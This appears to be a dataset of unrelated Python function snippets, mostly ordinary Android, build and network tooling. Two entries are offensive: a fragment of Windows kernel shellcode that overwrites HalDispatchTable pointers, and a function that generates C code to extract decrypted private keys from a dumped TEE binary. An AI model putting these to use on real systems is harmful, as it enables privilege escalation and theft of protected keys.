(\n\t\t\"\\x31\\xc0\"\n\t\t\"\\xb8\" + struct.pack(\"L\", HalpSetSystemInformation) +\n\t\t\"\\xa3\" + struct.pack(\"L\", HalDispatchTable + 0x8) +\n\t\t\"\\xb8\" + struct.pack(\"L\", HaliQuerySystemInformation) +\n\t\t\"\\xa3\" + struct.pack(\"L\", HalDispatchTable + 0x4)\n\t\t)\n\t\n\t\treturn shellcode", "def test_llvm_readelf(self):\n self.assertEqual(\n self.ndk.llvm_readelf,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-readelf\",\n )", "def c_code_cache_version(self):\r\n return ()", "def c_code_cache_version(self):\r\n return ()", "def swint(self) -> None:", "def main():\n\n dest_dir = sys.argv[1:][0] or '.'\n print 'Writing logs to: ' + dest_dir\n\n device_id = sys.argv[1:][1] or null\n print 'Using device_id: ' + device_id\n\n # Organize test output by device in case multiple devices are being tested.\n dest_dir = os.path.join(dest_dir, \"perftesting\", device_id)\n\n android_home = os.environ['ANDROID_HOME']\n print 'Your ANDROID_HOME is set to: ' + android_home\n # Uncomment this next line to hardcode your android_home if you can't set\n # it in your environment.\n # android_home = '/full/path/to/android/sdk'\n\n platform_tools = os.path.join(android_home, 'platform-tools')\n current_path = os.environ.get('PATH', '')\n os.environ['PATH'] = (platform_tools if current_path == '' else current_path +\n os.pathsep + platform_tools)\n\n if not os.path.isdir(android_home):\n print 'Your ANDROID_HOME path do not appear to be set in your environment'\n sys.exit(1)\n\n # Your SDK path. Adjust this to your needs.\n sdk_path = android_home\n\n # sets a variable with the package's internal name\n package_name = 'es.developer.achambi.pkmng'\n\n clean_test_files(dest_dir)\n\n # Connects to the current device, returning a MonkeyDevice object\n print 'Waiting for a device to be connected.'\n device = MonkeyRunner.waitForConnection(5, device_id)\n print 'Device connected.'\n\n # Protip1: Remove the screen lock on your test devices then uncomment\n # this like and the same one farther down. This will prevent you from\n # worrying about whether your device display has gone to sleep.\n # Alternatively, you can use the \"never sleep when charging\" developer\n # ption.\n # device.press(\"KEYCODE_POWER\", \"DOWN_AND_UP\")\n\n enable_dump_permission(sdk_path, device_id, dest_dir, package_name)\n enable_storage_permission(sdk_path, device_id, dest_dir, package_name)\n\n open_app(device, package_name)\n\n # Clear the dumpsys data for the next run must be done immediately\n # after open_app().\n reset_graphics_dumpsys(device, package_name)\n\n run_tests_and_systrace(sdk_path, device, device_id, dest_dir,\n package_name)\n\n # Device files could be in either location on various devices.\n pull_device_data_files(sdk_path, device_id,\n '/storage/emulated/0/Android/data/',\n dest_dir, package_name, '1')\n pull_device_data_files(sdk_path, device_id,\n '/storage/emulated/legacy/Android/data/',\n dest_dir, package_name, '2')\n\n # Protip1: See comment above.\n # device.press(\"KEYCODE_POWER\", \"DOWN_AND_UP\")\n\n analyze_data_files(dest_dir)", "def testPullMinidumps(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n time_offset = platform_backend.GetDeviceHostClockOffset()\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n # Android's implementation of \"touch\" doesn't support setting time via\n # Unix timestamps, only via dates, which are affected by timezones. So,\n # figure out what the device's timestamp for January 2nd, 1970 is and use\n # that to calculate the expected local timestamp. January 2nd is used\n # instead of January 1st so that we can't get accidentally get a negative\n # timestamp if the host-device clock offset is negative.\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', '-d', '1970-01-02T00:00:00', remote_dump_file])\n device_mtime = self._browser_backend.device.RunShellCommand(\n ['stat', '-c', '%Y', remote_dump_file], single_line=True)\n device_mtime = int(device_mtime.strip())\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n self.assertEqual(os.path.getmtime(local_path), device_mtime - time_offset)", "def sanitize(info):\n if \"processor\" in info and info[\"processor\"] == \"universal-x86-x86_64\":\n # If we're running on OS X 10.6 or newer, assume 64-bit\n if release[:4] >= \"10.6\": # Note this is a string comparison\n info[\"processor\"] = \"x86_64\"\n info[\"bits\"] = 64\n else:\n info[\"processor\"] = \"x86\"\n info[\"bits\"] = 32", "def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n from .android_required_password_type import AndroidRequiredPasswordType\n from .device_compliance_policy import DeviceCompliancePolicy\n from .device_threat_protection_level import DeviceThreatProtectionLevel\n\n from .android_required_password_type import AndroidRequiredPasswordType\n from .device_compliance_policy import DeviceCompliancePolicy\n from .device_threat_protection_level import DeviceThreatProtectionLevel\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"deviceThreatProtectionEnabled\": lambda n : setattr(self, 'device_threat_protection_enabled', n.get_bool_value()),\n \"deviceThreatProtectionRequiredSecurityLevel\": lambda n : setattr(self, 'device_threat_protection_required_security_level', n.get_enum_value(DeviceThreatProtectionLevel)),\n \"minAndroidSecurityPatchLevel\": lambda n : setattr(self, 'min_android_security_patch_level', n.get_str_value()),\n \"osMaximumVersion\": lambda n : setattr(self, 'os_maximum_version', n.get_str_value()),\n \"osMinimumVersion\": lambda n : setattr(self, 'os_minimum_version', n.get_str_value()),\n \"passwordExpirationDays\": lambda n : setattr(self, 'password_expiration_days', n.get_int_value()),\n \"passwordMinimumLength\": lambda n : setattr(self, 'password_minimum_length', n.get_int_value()),\n \"passwordMinutesOfInactivityBeforeLock\": lambda n : setattr(self, 'password_minutes_of_inactivity_before_lock', n.get_int_value()),\n \"passwordPreviousPasswordBlockCount\": lambda n : setattr(self, 'password_previous_password_block_count', n.get_int_value()),\n \"passwordRequired\": lambda n : setattr(self, 'password_required', n.get_bool_value()),\n \"passwordRequiredType\": lambda n : setattr(self, 'password_required_type', n.get_enum_value(AndroidRequiredPasswordType)),\n \"securityBlockJailbrokenDevices\": lambda n : setattr(self, 'security_block_jailbroken_devices', n.get_bool_value()),\n \"securityDisableUsbDebugging\": lambda n : setattr(self, 'security_disable_usb_debugging', n.get_bool_value()),\n \"securityPreventInstallAppsFromUnknownSources\": lambda n : setattr(self, 'security_prevent_install_apps_from_unknown_sources', n.get_bool_value()),\n \"securityRequireCompanyPortalAppIntegrity\": lambda n : setattr(self, 'security_require_company_portal_app_integrity', n.get_bool_value()),\n \"securityRequireGooglePlayServices\": lambda n : setattr(self, 'security_require_google_play_services', n.get_bool_value()),\n \"securityRequireSafetyNetAttestationBasicIntegrity\": lambda n : setattr(self, 'security_require_safety_net_attestation_basic_integrity', n.get_bool_value()),\n \"securityRequireSafetyNetAttestationCertifiedDevice\": lambda n : setattr(self, 'security_require_safety_net_attestation_certified_device', n.get_bool_value()),\n \"securityRequireUpToDateSecurityProviders\": lambda n : setattr(self, 'security_require_up_to_date_security_providers', n.get_bool_value()),\n \"securityRequireVerifyApps\": lambda n : setattr(self, 'security_require_verify_apps', n.get_bool_value()),\n \"storageRequireEncryption\": lambda n : setattr(self, 'storage_require_encryption', n.get_bool_value()),\n }\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields", "def _debugmallocstats(): # real signature unknown; restored from __doc__\n pass", "def _magic_bgmt(self, s):\n s = s.strip()\n if idapy._d is None:\n print \"Please select a dump first. Example:\"\n print \"sel t2i\"\n return\n a = addr_from_magic_string(s, rounded_32bit = False)\n f = idapy._d.Fun(\"gui_massive_event_loop\")\n r = find_refs(idapy._d, a, f.addr)\n \n for a,v in r:\n bkt.back_deco(a)\n \n print r", "def _fix_up(self, cls, code_name):", "def dump_proc_self_maps():\n return", "def _assemble_smali(self, dest, source):\n try:\n subprocess.check_call(['smali', 'a', source, '-o', dest])\n except EnvironmentError:\n self.skipTest('smali not available')", "def StripPC(addr):\n global ARCH\n if ARCH == \"arm\":\n return addr & ~1\n return addr", "def __init__(self, line, a_v):\n # If this is an old-style process line (Android<=6.0)\n if a_v == \"6.0\" or (a_v[0].isdigit() and (int(a_v[0])) < 6):\n if not Process.correct_line_6_0.match(line):\n raise ValueError('Bad process \"{}\"'.format(line))\n p = line.split(None, 4)\n self._context = Context(p[0])\n self._user = p[1]\n self._pid = p[2]\n self._ppid = p[3]\n self._name = p[4]\n # If this is a new-style process line (Android>=6.0.1)\n elif a_v == \"6.0.1\" or Process.SUPPORT_NEWER_VERSIONS:\n if not Process.correct_line_6_0_1.match(line):\n raise ValueError('Bad process \"{}\"'.format(line))\n p = line.split(None, 9)\n self._context = Context(p[0])\n self._user = p[1]\n self._pid = p[2]\n self._ppid = p[3]\n self._vsize = p[4]\n self._rss = p[5]\n self._wchan = p[6]\n self._pc = p[7]\n self._status = p[8]\n self._name = p[9]\n else:\n raise NotImplementedError(\"Unsupported Android version.\")", "def cache_code(self):\n\n # Generate the prologue\n self._synthesize_prologue()\n\n # Don't have a real epilogue.\n self.add(spu.stop(0x2000))\n # self._check_alignment(self._code, 'spu code')\n\n # self.exec_module.make_executable(self._code.buffer_info()[0], len(self._code))\n\n # Append our instructions to the prologue's, first making sure the alignment is correct.\n if len(self._prologue._code) % 2 == 1: # Odd number of instructions\n self._prologue.add(spu.lnop(0))\n\n self._prologue._code.extend(self._code)\n self._prologue._check_alignment(self._prologue._code, 'spu prologue')\n \n self._epilogue = self \n self._cached = True\n return", "def test_GetSymbolMapping_multiple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/otherapp.mojo at /path/to/otherapp.mojo/.kW07s\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\",\n \"/path/to/otherapp.mojo/.kW07s\": \"libotherapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def test_universal64_dsym(self):\n self.build(debug_info=\"dsym\", dictionary={'FAT64_DSYM': '1'})\n self.do_test()", "def test_amd64(self):\n self.do_test(\"2lwp_t2_SIGSEGV.amd64\", pid=622, region_count=24)", "def test_amd64(self):\n self.do_test(\"2lwp_process_SIGSEGV.amd64\", pid=665, region_count=24)", "def obfuscate(self):\n self.split_ir()\n self.minimize_ir() # doesn't always work\n self.translate_ir()", "def get_match_line(smali_line, android_method_list, is_rename):\r\n method_match = re.search(r'^([ ]*?)\\.method(.*?) (?P<invokeMethod>([^ ]*?))\\((?P<invokePass>(.*?))\\)(?P<invokeReturn>(.*?))$', smali_line) # Match a method definition\r\n if method_match is None:\r\n print smali_line, # Otherwise print back the line unchanged\r\n return None # Return None\r\n method_name = method_match.group('invokeMethod') # Recover the method name\r\n if method_name not in android_method_list: # For non SDK method\r\n if is_rename:\r\n print smali_line.replace(method_name + '(', crypt_identifier(method_name) + '('), # Append\r\n else:\r\n print smali_line,\r\n return method_name # Return the method name\r\n else:\r\n print smali_line, # Otherwise print back the line unchanged\r\n return None # Return None\r", "def test_universal64_dsym(self):\n self.build(debug_info=\"dsym\", dictionary={\"FAT64_DSYM\": \"1\"})\n self.do_test()", "def make_codes(self):\n\t\troot = heapq.heappop(self.heap)#obtenemos la raiz del arbol\n\t\tcurrent_code = \"\"\n\t\tself.make_codes_helper(root, current_code)", "def clearDumpDescCallbacks(self):\n pass", "def _compat_parse_magic(self):\n def warning(magic, option):\n LOG.warning(\"Deprecated \\\"magic\\\" option \\\"{m}\\\" found. Please use new-style option \\\"{o}\\\" instead (see user manual).\".format(m=magic, o=option))\n\n magic_auto_backports = re.search(r\"\\*\\s*MINI_BUILDD:\\s*AUTO_BACKPORTS:\\s*([^*.\\[\\]]+)\", self._top_changes)\n if magic_auto_backports:\n warning(\"AUTO_BACKPORTS\", \"auto-ports\")\n self._set(\"auto-ports\", magic_auto_backports.group(1))\n\n magic_backport_mode = re.search(r\"\\*\\s*MINI_BUILDD:\\s*BACKPORT_MODE\", self._top_changes)\n if magic_backport_mode:\n warning(\"BACKPORT_MODE\", \"ignore-lintian\")\n self._set(\"ignore-lintian\", \"true\")", "def dump_compiler(input_bytes):\n return dump_from_release(input_bytes, \"compiler\")", "def fiddle_with_flags():\n flags['c++'] += '-arch x86_64 -bundle'\n flags['c'] += '-arch x86_64'", "def do_minify(self):\n if shared.Settings.SPLIT_MEMORY:\n # must be done before minification\n self.queue += ['splitMemory', 'simplifyExpressions']\n\n if self.opt_level >= 2:\n if self.debug_level < 2 and not self.use_closure_compiler == 2:\n self.queue += ['minifyNames']\n if self.debug_level == 0:\n self.minify_whitespace = True\n\n if self.use_closure_compiler == 1:\n self.queue += ['closure']\n elif self.debug_level <= 2 and shared.Settings.FINALIZE_ASM_JS and not self.use_closure_compiler:\n self.cleanup_shell = True", "def GenerateHelperFunctions(self, out):\n out.Write(\"\"\"/* Use local strcmp to avoid dependency on libc. */\nstatic int mystrcmp(const char* s1, const char *s2) {\n while (1) {\n if (*s1 == 0) break;\n if (*s2 == 0) break;\n if (*s1 != *s2) break;\n ++s1;\n ++s2;\n }\n return (int)(*s1) - (int)(*s2);\n}\\n\n\"\"\")", "def set_xml_fetch_method(self, use_xml_dumper):\n self.android_device_driver.use_xml_dumper = use_xml_dumper", "def snapshot(device):\n cmds = \"\"\n if device.model in ['9500', '4500']:\n cmds += \"\"\"\nshow users\nshow version\nshow vlan brief\nshow interfaces status\nshow ip interface brief\nshow ip route summary\nshow ipv6 interface brief\nshow ipv6 route summary\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbors\nshow bgp ipv4 unicast summary\nshow bgp ipv6 unicast summary\nshow ip arp\nshow mac address-table\nshow running-config\n\"\"\"\n elif device.model == '3850':\n cmds += \"\"\"\nshow users\nshow version\nshow vlan brief\nshow interfaces status\nshow ip interface brief\nshow ip route summary\nshow ip arp\nshow mac address-table\nshow running-config\n\"\"\"\n elif device.model == 'E6000':\n cmds += \"\"\"\nshow users\nshow version\nshow linecard status\nshow ip interface brief\nshow ip route summary\nshow ipv6 interface brief\nshow ipv6 route summary\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbor\nshow bgp ipv4 summary\nshow bgp ipv6 summary\nshow ip route rip\nshow cable modem summary mac\nshow cable modem\nshow cable modem detail\nshow video sessions\nshow video sessions summary\nshow running-config verbose\n\"\"\"\n elif device.model == 'C100G':\n cmds += \"\"\"\nshow user current\nshow version\nshow chassis status\nshow ip interface brief\nshow ip route summary\nshow ipv6 interface brief\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbors\nshow ip bgp summary\nshow ipv6 bgp summary\nshow ip route rip\nshow cable modem docsis-mac summary\nshow cable modem verbose\nshow cable modem cpe\nshow video session all brief\nshow video session all summary\nshow running-config\n\"\"\"\n elif device.model == 'CBR8':\n cmds += \"\"\"\nshow users\nshow version\nshow platform\nshow ip interface brief | exclude unset\nshow ip route summary\nshow ipv6 interface brief | exclude unass|^Cable|^Video|^In|^Wideband|^Dti|^VirtualPortGroup\nshow ipv6 route summary\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbors\nshow bgp ipv4 unicast summary\nshow bgp ipv6 unicast summary\nshow ip route rip\nshow cable modem summary total\nshow cable modem verbose\nshow cable video session all\nshow cable video session all summary\nshow running-config\n\"\"\"\n elif device.model in ['9504N', '9516']:\n cmds += \"\"\"\nshow users\nshow version\nshow ip interface brief | exclude unass\nshow ip route summary\nshow ipv6 interface brief\nshow ipv6 route summary\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbors\nshow bgp ipv4 unicast summary\nshow bgp ipv6 unicast summary\nshow ip route rip\nshow cable modem summary\nshow cable modem\nshow running-config\n\"\"\"\n elif device.model == '7360':\n cmds += \"\"\"\nshow session\nshow software-mngt oswp\nshow router interface summary\nshow router ospf neighbor\nshow router isis interface\nshow router bgp summary family ipv4\nshow router bgp summary family ipv6\nshow router status\nshow router route-table ipv4 summary\nshow router route-table ipv6 summary\nshow cable modem summary total\nshow cable modem\ninfo configure\n\"\"\"\n elif device.model == 'GAC':\n cmds += \"\"\"\nshow users | nomore\nshow version | tab | nomore\nshow router ospf 0 neighbor | nomore\nshow router isis 0 interface | nomore\nshow router bgp summary | nomore\nshow router rip database | nomore\nshow router route-table ipv4 summary | nomore\nshow router route-table ipv6 summary | nomore\nshow cable modem brief | tab | nomore\nshow cable modem cpe | tab | nomore\nshow configuration | display set | nomore\n\"\"\"\n return device.get_response(p.string_to_array(cmds), timeout=300, expect=r\"(?m)^(\\r)?(\\x1b\\[(\\?7h|K))?(\\*)?([)?([\\w\\-/]+[@:])?[\\w\\-]+(\\[A/U\\])?(\\([ \\w\\-]+\\))?([ :]~)?(])?(>([\\w\\-]+)+>)?(>)?([\\w\\-]+>)*[$#>%]\")", "def test_llvm_ar(self):\n self.assertEqual(\n self.ndk.llvm_ar,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-ar\",\n )", "def gencode(globaltask):\n\n with open(globaltask) as f:\n data = f.read()\n\n # Find begin of symbol name string table (located at the end)\n string_table_begin = find_string_table_begin(data)\n strings = data[string_table_begin:]\n # Read out symbols\n sym_map = {}\n try:\n # Load symbols\n for i in range(1, 100000):\n idx = string_table_begin - 16 * i\n strings_off = u32(data[idx:idx+4])\n addr = u32(data[idx+4:idx+8])\n size = u32(data[idx+8:idx+12])\n type = u32(data[idx+12:idx+16])\n sym_name = strings[strings_off:strings.index('\\x00', strings_off)]\n if addr == 0 or not sym_name.endswith('.c'):\n sym_map[sym_name] = addr\n except ValueError:\n pass\n\n if len(sym_map) == 0:\n raise GlobaltaskGenCodeException(\"Could not get symbols.\")\n\n # Generate C code\n ccode = \"\"\"\n #include <stdio.h>\n #include <sys/mman.h>\n #include <string.h>\n #include <stdint.h>\n \"\"\"\n ccode += '__attribute__((aligned(0x100000))) unsigned char data[] = {\\n'\n for i in range(0, len(data), 30):\n ccode += ' '\n for c in data[i:i+30]:\n ccode += str(u8(c)) + ','\n ccode += '\\n'\n ccode += '};\\n'\n ccode += \"\"\"\n void mydump(const char *desc, const char *buf, int len) {\n if (desc) {\n printf(\"%s = '\", desc);\n } else {\n printf(\"'\");\n }\n for (int i = 0; i < len; ++i) {\n printf(\"\\\\\\\\x%02x\", buf[i]);\n }\n printf(\"'\\\\n\");\n }\n\n int main() {\n // Make pages read write executable\n mprotect(data, sizeof(data), PROT_READ | PROT_WRITE | PROT_EXEC);\n\n // Fix .got table, as there is an absolute table_zygote_ptr used by wb_decrypt_key\n uint32_t *got_table = (uint32_t*)(data + \"\"\" + hex(sym_map['TEE_GOT_START']) + \"\"\");\n uint32_t *got_table_end = (uint32_t*)(data + \"\"\" + hex(sym_map['TEE_GOT_END']) + \"\"\");\n for (uint32_t *entry = got_table; entry != got_table_end; ++entry) {\n if (*entry)\n *entry += (uint32_t)data;\n }\n\n char *ciphertext1 = data + \"\"\" + hex(sym_map['ciphertext1']) + \"\"\";\n char *ciphertext2 = data + \"\"\" + hex(sym_map['ciphertext2']) + \"\"\";\n char*(*wb_decrypt_key)(char *, char *, unsigned int) = ((char*(*)(char*, char*, unsigned int))(data + \"\"\" + hex(sym_map['wb_decrypt_key']) + \"\"\"));\n\n // Decrypt private key\n char buf[4096] = {0};\n wb_decrypt_key(ciphertext1, buf, 320);\n mydump(\"private_key\", buf, 320);\n\n // Decrypt public key\n char buf2[4096] = {0};\n wb_decrypt_key(ciphertext2, buf2, 272);\n mydump(\"public_key\", buf2, 272);\n\n return 0;\n }\n \"\"\"\n\n return ccode", "def dump_core(self):\n raise AssertionError(\"Core Dump function not implemented\")", "def kill_android():\r\n try:\r\n if androids[0]:\r\n androids[0] = None\r\n if androids[1]:\r\n androids[0] = androids[1]\r\n except IndexError:\r\n print \"index error\"", "def getPhases():", "def getScramArch(self):\n return self[\"SCRAM_ARCH\"]", "def patch_sdk():", "def patch_sdk():", "def patch_sdk():", "def test_patch_pci_switch(self):\n pass", "def is_source_prefix_mangled(self):\n return False", "def unusedFromKDOTDataPreparation():", "def disarm(self):\n pass", "def test_universal64_executable(self):\n self.build(debug_info=\"dsym\")\n self.do_test()", "def test_universal64_executable(self):\n self.build(debug_info=\"dsym\")\n self.do_test()", "def test_amd64(self):\n self.do_test(\"1lwp_SIGSEGV.amd64\", pid=693, region_count=21)", "def RunSymbolizer(input_file, output_file, build_ids_files):\n\n symbolizer = GetHostToolPathFromPlatform('symbolizer')\n symbolizer_cmd = [\n symbolizer, '--build-id-dir',\n os.path.join(SDK_ROOT, '.build-id')\n ]\n for build_ids_file in build_ids_files:\n symbolizer_cmd.extend(['--ids-txt', build_ids_file])\n\n logging.info('Running \"%s\".' % ' '.join(symbolizer_cmd))\n return subprocess.Popen(symbolizer_cmd, stdin=input_file, stdout=output_file,\n stderr=subprocess.STDOUT, close_fds=True)", "def _c_optimizations_ignored():\n pure_env = os.environ.get('PURE_PYTHON')\n return pure_env != \"0\" if pure_env is not None else PYPY", "def split_debug(src, objcopy=None, objdump=None):\n if objcopy is None:\n objcopy = \"objcopy\"\n if objdump is None:\n objdump = \"objdump\"\n if not contains_debug_info(src, objdump=objdump):\n ui.info(\"-- Already stripped\", src)\n return\n src_stat = os.stat(src)\n dirname, basename = os.path.split(src)\n debug_dir = os.path.join(dirname, \".debug\")\n qisys.sh.mkdir(debug_dir)\n dest = os.path.join(src, debug_dir, basename)\n to_run = list()\n to_run.append([objcopy, \"--only-keep-debug\", src, dest])\n to_run.append([objcopy,\n \"--strip-debug\",\n \"--strip-unneeded\",\n \"--add-gnu-debuglink=%s\" % dest,\n src])\n try:\n for cmd in to_run:\n qisys.command.check_output(cmd, stderr=subprocess.STDOUT)\n ui.info(\"-- Debug info extracted for\", src)\n except qisys.command.CommandFailedException as e:\n ui.error(\"Error while Extracting package debug for %s\" % src)\n ui.error(str(e))\n # After the commands have run, utime of the file has changed, causing\n # cmake to re-install the libraries. Which is not cool ...\n # So set back mtime to its previous value:\n os.utime(src, (src_stat.st_atime, src_stat.st_mtime))", "def reverseLocalFonctionPointerNames(context):\n fsave = context.config.getCacheFilename(\n context.config.CACHE_FUNCTION_NAMES,\n context.dumpname)\n if os.access(fsave, os.F_OK):\n vtable = pickle.load(file(fsave, 'rb'))\n for x in vtable.items():\n yield x\n raise StopIteration\n\n IGNORES = ['None', '[heap]', '[stack]', '[vdso]']\n\n # XXX this is not portable.\n libdl = ctypes.CDLL('libdl.so')\n\n def getname(fnaddr):\n info = Dl_info()\n ret = libdl.dladdr(fnaddr, ctypes.byref(info))\n return info.dli_sname.string, info.dli_saddr\n\n mappings = context.mappings\n ldso = dict()\n for m in mappings:\n if m.pathname not in IGNORES and m.pathname not in ldso:\n try:\n ldso[m.pathname] = ctypes.CDLL(m.pathname)\n except OSError as e:\n IGNORES.append(m.pathname)\n\n # looking in [heap] pointing to elsewhere\n all_ptrs = context.listPointerValueInHeap()\n log.debug('[+] %d pointers in heap to elsewhere ' % (len(all_ptrs)))\n\n localmappings = getMappings()\n vtable = dict()\n\n for ptr in set(all_ptrs):\n # get dump mmap\n m = mappings.get_mapping_for_address(ptr)\n if m.pathname not in IGNORES:\n # find the right localmmap\n localmaps = localmappings._get_mapping(m.pathname)\n found = False\n for localm in localmaps:\n if localm.offset == m.offset and localm.permissions == m.permissions:\n # found it\n found = True\n caddr = ptr - m.start + localm.start # rebase\n dl_name, fnaddr = getname(caddr)\n if dl_name is not None:\n if fnaddr == caddr: # reverse check\n log.debug('[+] REBASE 0x%x -> 0x%x p:%s|%s|=%s off:%x|%x|=%s %s fn: %s @%x' % (\n ptr, caddr, m.permissions, localm.permissions, localm.permissions == m.permissions,\n m.offset, localm.offset, m.offset == localm.offset, m.pathname, dl_name, fnaddr))\n vtable[ptr] = dl_name\n yield (ptr, dl_name)\n else:\n continue\n print('[-] MIDDLE 0x%x -> 0x%x p:%s|%s|=%s off:%x|%x|=%s %s fn: %s @%x' % (\n ptr, caddr, m.permissions, localm.permissions, localm.permissions == m.permissions,\n m.offset, localm.offset, m.offset == localm.offset, m.pathname, dl_name, fnaddr))\n else:\n continue\n print('FAIL REBASE (not public ?) 0x%x -> 0x%x p:%s|%s|=%s off:%x|%x|=%s %s fn: %s ' % (\n ptr, caddr, m.permissions, localm.permissions, localm.permissions == m.permissions,\n m.offset, localm.offset, m.offset == localm.offset, m.pathname, dl_name))\n pass\n break\n if not found:\n continue\n print('[+] not a fn pointer %x\\n' % (ptr), m, '\\n ---dump Vs local ---- \\n',\n '\\n'.join(map(str, localmaps)))\n # pass\n for name, lib in ldso.items():\n ret = libdl.dlclose(lib._handle)\n\n import pickle\n pickle.dump(vtable, file(fsave, 'wb'))\n\n raise StopIteration", "def generate_payu_hash_android(data):\n hash_keys = ('txnid', 'amount', 'productinfo', 'firstname', 'email', 'udf1', 'udf2', 'udf3', 'udf4', 'udf5')\n\n hashes = {}\n pkey = config('PAYU_KEY')\n salt = config('PAYU_SALT')\n\n value = pkey\n for key in hash_keys:\n value += \"{}{}\".format('|', data.get(key, ''))\n\n value += \"{}{}\".format('||||||', salt)\n hashes['payment_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnNameMerchantCodes = 'get_merchant_ibibo_codes'\n value = pkey + '|' + cmnNameMerchantCodes + '|default|' + salt\n hashes['get_merchant_ibibo_codes_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnMobileSdk = 'vas_for_mobile_sdk'\n value = pkey + '|' + cmnMobileSdk + '|default|' + salt\n hashes['vas_for_mobile_sdk_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnEmiAmountAccordingToInterest = 'getEmiAmountAccordingToInterest'\n value = pkey + '|' + cmnEmiAmountAccordingToInterest + '|' + str(data.get('amount', '')) + '|' + salt\n hashes['emi_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnPaymentRelatedDetailsForMobileSdk1 = 'payment_related_details_for_mobile_sdk'\n value = pkey + '|' + cmnPaymentRelatedDetailsForMobileSdk1 + '|default|' + salt\n hashes['payment_related_details_for_mobile_sdk_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnVerifyPayment = 'verify_payment'\n value = pkey + '|' + cmnVerifyPayment + '|' + data.get('txnid', '') + '|' + salt\n hashes['verify_payment_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n if data.get('user_credentials'):\n cmnNameDeleteCard = 'delete_user_card'\n value = pkey + '|' + cmnNameDeleteCard + '|' + data['user_credentials'] + '|' + salt\n hashes['delete_user_card_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnNameGetUserCard = 'get_user_cards'\n value = pkey + '|' + cmnNameGetUserCard + '|' + data['user_credentials'] + '|' + salt\n hashes['get_user_cards_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnNameEditUserCard = 'edit_user_card'\n value = pkey + '|' + cmnNameEditUserCard + '|' + data['user_credentials'] + '|' + salt\n hashes['edit_user_card_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnNameSaveUserCard = 'save_user_card'\n value = pkey + '|' + cmnNameSaveUserCard + '|' + data['user_credentials'] + '|' + salt\n hashes['save_user_card_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n cmnPaymentRelatedDetailsForMobileSdk = 'payment_related_details_for_mobile_sdk'\n value = pkey + '|' + cmnPaymentRelatedDetailsForMobileSdk + '|' + data['user_credentials'] + '|' + salt\n hashes['payment_related_details_for_mobile_sdk_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n if data.get('udf3'):\n cmnSend_Sms = 'send_sms'\n value = pkey + '|' + cmnSend_Sms + '|' + data['udf3'] + '|' + salt\n hashes['send_sms_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n if data.get('offerKey'):\n cmnCheckOfferStatus = 'check_offer_status'\n value = pkey + '|' + cmnCheckOfferStatus + '|' + data['offerKey'] + '|' + salt\n hashes['check_offer_status_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n if data.get('cardBin'):\n cmnCheckIsDomestic = 'check_isDomestic'\n value = pkey + '|' + cmnCheckIsDomestic + '|' + data['cardBin'] + '|' + salt\n hashes['check_isDomestic_hash'] = sha512(value.encode('utf-8')).hexdigest().lower()\n\n return hashes", "def freeze(self):\r\n\r\n # this code is probably rather ickier than it needs to be!\r\n for i in range(len(self.data)):\r\n e = self.data[i]\r\n if not isinstance(e.code, str):\r\n self.data[i] = type(e)((label(e.code),) + e[1:])\r\n if e.calls:\r\n for j in range(len(e.calls)):\r\n se = e.calls[j]\r\n if not isinstance(se.code, str):\r\n e.calls[j] = type(se)((label(se.code),) + se[1:])", "def compact_style_code():\n try: raise Exception # NOQA\n except Exception: pass # NOQA", "def _draw_mash(base_symbol: str, ds_symbol: int) -> Tuple[str, str]:\n id_to_name = {\n 0: 'circle',\n 1: 'square',\n 2: 'diamond',\n 3: 'cross',\n 4: 'x',\n 5: '\"triangle-up\"',\n 6: '\"triangle-down\"',\n 7: '\"triangle-left\"',\n 8: '\"triangle-right\"',\n 9: '\"triangle-ne\"',\n 10: '\"triangle-se\"',\n 11: '\"triangle-sw\"',\n 12: '\"triangle-nw\"',\n 13: 'pentagon',\n 14: 'hexagon',\n 15: 'hexagon2',\n 16: 'octagon',\n 17: 'star',\n 18: 'hexagram',\n 19: '\"star-triangle-up\"',\n 20: '\"star-triangle-down\"',\n 21: '\"star-square\"',\n 22: 